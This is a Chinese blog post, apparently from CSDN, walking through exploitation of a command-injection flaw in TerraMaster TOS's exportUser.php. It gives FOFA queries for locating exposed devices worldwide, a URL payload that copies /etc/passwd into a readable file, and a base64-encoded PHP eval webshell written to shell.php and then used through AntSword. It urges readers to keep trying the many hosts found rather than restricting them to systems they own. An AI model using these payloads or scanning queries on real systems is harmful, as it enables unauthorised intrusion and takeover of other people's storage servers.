记录一次复现TerraMaster TOS exportUser.php 文件中存在远程命令执行漏洞

最新推荐文章于 2024-08-30 13:29:17 发布
最新推荐文章于 2024-08-30 13:29:17 发布
阅读量332 收藏 1
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sszsNo1/article/details/131333585
版权
本文详细介绍了如何复现TerraMasterTOS4.1.24版本之前的远程命令执行漏洞,包括使用FOFA搜索引擎寻找受影响资产,通过构造POC验证漏洞,并演示了写入shell和利用webshell进行连接的步骤。
摘要由CSDN通过智能技术生成

今天刚学完命令执行与代码执行,准备复现一下,发现TerraMaster TOS exportUser.php 文件中存在远程命令执行漏洞,那就复现它了。

漏洞影响

TerraMaster TOS < 4.1.24

1、先搜索相关资产

在这里我使用的是fofa搜索引擎,构造的语句也是fofa语句,考虑到大家有的没有fofa搜索引擎特意在此送上网址 

网络空间测绘,网络空间安全搜索引擎,网络空间搜索引擎,安全态势感知 - FOFA网络空间测绘系统undefined

fofa语句:"TerraMaster" && header="TOS"

以上搜索的是国内资产,大家要是想要国外的资产,可以使用以下语句:

国外的:"TerraMaster" && header="TOS" && country!="CN"

在这里特意说明一下:搜索的资产不能百分百说是某国家的,但大部分都是。

2、使用以下poc验证即可

首先在网址后面拼接以下poc,尝试写入文件test.txt

poc:/include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)>test.txt

拼接完上面的,换成以下拼接,尝试是否能够成功读取到test.txt文件内容

poc:/include/test.txt

读取的内容是/etc/passwd,要是出现如下内容,那就恭喜你,复现成功,没出现的也不要放弃,资产比较多,复现是需要慢慢来的,重要的是不能半途而废。

 以上都出现了,说明此次复现结束;以下内容是复现外的扩展,可做可不做,讲述如何写入shell,并连接。(必须复现成功才能做扩展)

1、拼接以下,写入一句话木马

/include/exportUser.php?type=3&cla=application&func=_exec&opt=(echo "PD9waHAgQGV2YWwoJF9QT1NUWzFdKTsgPz4="|base64 -d)>shell.php

2、拼接完以上的,换成以下的进行再次拼接读取shell.php

/include/shell.php

3、使用webshell连接工具进行连接,我使用的是中国蚁剑,密码是1,网址后面拼接以下进行连接即可。

/include/shell.php

到这里此次复现圆满结束,最后告诉大家,大部分存在命令与代码执行的漏洞,大概率都能拿到shell,复现类似的漏洞,希望大家能够做的圆满些;小编是个小白,哪里不行请大家告知,小编会进行学习并修改。

sszsNo1
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞复现 || TerraMaster TOS exportUser.php 远程命令执行
失心少年
07-11 739
TerramasterTOS国深圳市图美电子技术(Terramaster)公司的一款基于Linux平台的,专用于erraMaster云存储NAS服务器的操作系统。技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!2.访问该test.txt,得到回显。
TerraMaster TOS api.php 信息泄露和远程命令执行
qq_36334672的博客
03-10 452
erramasterTOS国深圳市图美电子技术(Terramaster)公司的一款基于 Linux 平台的,专用于 erraMaster 云存储 NAS 服务器的操作系统。TerramasterTOS 系统 api.php 存在信息泄露 / 远程代码执行漏洞,攻击者通过漏洞可以获取服务器权限,导致服务器失陷。
TerraMaster TOS 远程命令执行(CVE-2022-24989)TerraMaster TOS 敏感信息泄露(CVE-2022-24990)
weixin_41308444的博客
08-29 3120
TerraMaster TOS 远程命令执行(CVE-2022-24989) TerraMaster TOS 敏感信息泄露(CVE-2022-24990)
漏洞复现TerraMaster TOS exportUser.php 远程命令执行
凝聚力安全团队
07-08 355
TOS 是一款专为TerraMaster NAS量身打造的网页界面操作系统。采用桌面式多功能使用者界面,提供可靠的无缝文件共享、数据备份以及整合虚拟化解决方案。
Terramaster TOS 命令注入漏洞(CVE-2022-24990).Centos7漏洞扫描
weixin_52998454的博客
03-24 742
Terramaster TOS 命令注入漏洞(CVE-2022-24990).Centos7漏洞扫描
TerraMaster(铁威马)NAS F2-NAS2&F4-NAS V2.515固件
03-19
此外,值得注意的是,压缩包的"TerraMaster_Tcloud_for_win_V2.515"文件,这很可能是TerraMaster云服务的Windows客户端软件,与固件同步更新至V2.515版本。这意味着用户在更新固件的同时,也可以享受到与之匹配的...
铁威马TerraMaster T-Cloud V1.8.rar
01-17
铁威马TerraMaster T-Cloud是一款由铁威马(TerraMaster)公司推出的云存储解决方案,主要用于个人和企业用户的数据备份、同步和共享。在本文,我们将深入探讨这款软件的历史版本——V1.8,以及它在当时提供的功能...
TerraMaster(铁威马)NAS F2-NAS2&F4-NAS烧录程序
03-19
在NAS设备,烧录程序是将特定的NAS操作系统(如TerraMaster的DOS系统或TOSTerraMaster Operating System)安装到SD卡或USB驱动器上的过程。这个操作对于初始设置和恢复NAS设备至出厂状态至关重要。 对于F2-NAS2...
TerraMaster TOS createRaid 远程命令执行(CVE-2022-24990)
孤桜懶契
03-27 1621
漏洞描述 TerraMaster TOS mobile.class.php文件的createRaid办法存在远程命令执行破绽 ,攻击者配合 CVE-2022-24990破绽能够获取效劳器权限 漏洞影响 TerraMaster TOS < 4.2.31 空间测绘 d ⭕FOFA:“TOS Loading” && country=“CN” 漏洞复现 首页访问 信息泄露 写入phpinfo 脚本地址 https://github.com/lishang520/CVE
TerraMaster TOS RCE
吾所在处,即为净土
07-22 233
我们都是在一条铺满荆棘的新路上摸索着前行,碰个鼻青眼肿几乎不可避免,而问题在于,我们能不能在这条路上跌倒之后,爬起来继续走下去。
远程 命令/代码 执行(remote command/code execute)漏洞总结
未完成的歌~的博客
08-20 8469
这周来学习下命令执行漏洞命令执行漏洞是用户通过浏览器在远程服务器上执行任意系统命令,与代码执行漏洞没有太大的区别,不过我们在学习时还是要区分不同的概念。关于代码执行漏洞会在下篇博客详述。 一、什么是命令执行漏洞: 应用有时需要调用一些执行系统命令的函数,如PHP的system、exec、shell_exec、passthru、popen、proc_popen等,当用户能控制这些函数的参数时...
CVE-2017-8464远程命令执行漏洞复现
WFC1006848997的博客
01-12 1453
CVE-2017-8464远程命令执行漏洞复现 漏洞描述 2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危 Windows系统通过解析 .LNK 后缀文件时,是使用二进制来解析的,而当恶意的二进制代码被系统识别执行的时候就可以实现远程代码执行,由于是在explorer.exe进程运行的,所以load进内存的时候与当前用户具有相同的权
CVE-2022-24990信息泄露 RCE漏洞
PolarPeak的博客
06-05 2242
Terramaster TOS国铁威马(Terramaster)公司的一款基于Linux平台的,专用于erraMaster云存储NAS服务器的操作系统。 Terramaster TOS 4.2.29版本存在命令注入漏洞,该漏洞源于api.php脚本的webNasIPS 组件的输入验证不正确。未经身份验证的攻击者可以发送特殊数据利用该漏洞并在目标系统上执行任意命令TerraMaster TOS mobile.class.php文件的createRaid方法存在远程命令执行漏洞 ,攻击者配合 CVE
php 小米路由器_ISE在路由器和NAS设备发现125个CVE漏洞
weixin_39695701的博客
12-20 1495
安全专家对NAS(network-attached storage,网络连接存储)设备和小型办公室和家用路由器的安全性进行了分析,发现了多个安全漏洞。该研究是由独立安全评估公司(Independent Security Evaluators,ISE)进行的项目,名为 SOHOpelessly Broken 2.0。该项目的第一阶段SOHOpelessly Broken 1.0是从2013...
使用 树莓派3B+ 对日本葡萄园进行经济实惠的环境监测
EDATEC的博客
08-29 872
然而,他也热衷于酿造 “优质葡萄酒”,随着他所居住的东京北部胜沼地区葡萄酒旅游业的兴起,他感觉到了商机。菊岛热衷于在他所谓的 “Hinno ”物联网系统使用太阳能,日语的 “Hinno ”表明这是一种简单的农民葡萄栽培方法,因为太阳能还可以用来为电栅栏供电,防止动物靠近作物。他还可以在办公室里随时观察大气状况。对于 菊岛邦夫—Vineyard Kikushima 而言,Raspberry Pi 生态系统提供了支持和信息,通过基于温度和湿度监测的有针对性的最低限度杀虫剂方案,来提高葡萄的健康产量。
Nginx的lnmp服务搭建
2201_75745826的博客
08-29 792
nginx是一款功能强大的web服务器。和apache一样,有http和https两个服务。nginx功能强大,且库使用第三方模块,正反向代理等。Nginx默认采用多进程工作方式,Nginx启动后,会运行一个master进程和多个worker进程。其master充当整个进程组与用户的交互接口,同时对进程进行监护,管理worker进程来实现重启服务、平滑升级、更换日志文件、配置文件实时生效等功能。worker用来处理基本的网络事件,worker之间是平等的,他们共同竞争来处理来自客户端的请求。
【Linux篇】网络请求和下载与端口
2301_80912559的博客
08-26 1292
如图,计算机A的微信连接计算机B的微信,A使用的50001即动态端口,临时找一个端口作为出口。计算机B的微信使用端口5678,即注册端口,长期绑定此端口等待别人连接。在win系统,可以通过任务管理器选择进程后,点击结束进程从而关闭。IP地址相当于小区地址,在小区内可以有很多住户(程序)而门牌号(端口)就是各个住户(程序)的联系地址。为管理运行的程序,每一个程序在运行的时候,便被操作系统注册为系统的一个进程。计算机程序之间的通讯,通过IP只能锁定计算机,但是无法锁定具体的程序。
workman和GateWay学习笔记
最新发布
lxp199741的博客
08-30 53
workman支持UdpGateWay是基于workman的二次封装,更适合长链接场景。
TerraExplorerPro二次开发用户操作手册-5G应用的界面与API详解
"国移动研究院发布的5g典型应用案例集锦,主要涵盖了TerraExplorerPro的二次开发用户操作手册,包括API V7.0.1的更新和SGWorld接口的详细说明。" 本文档详细介绍了如何利用TerraExplorerPro进行二次开发,以创建...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值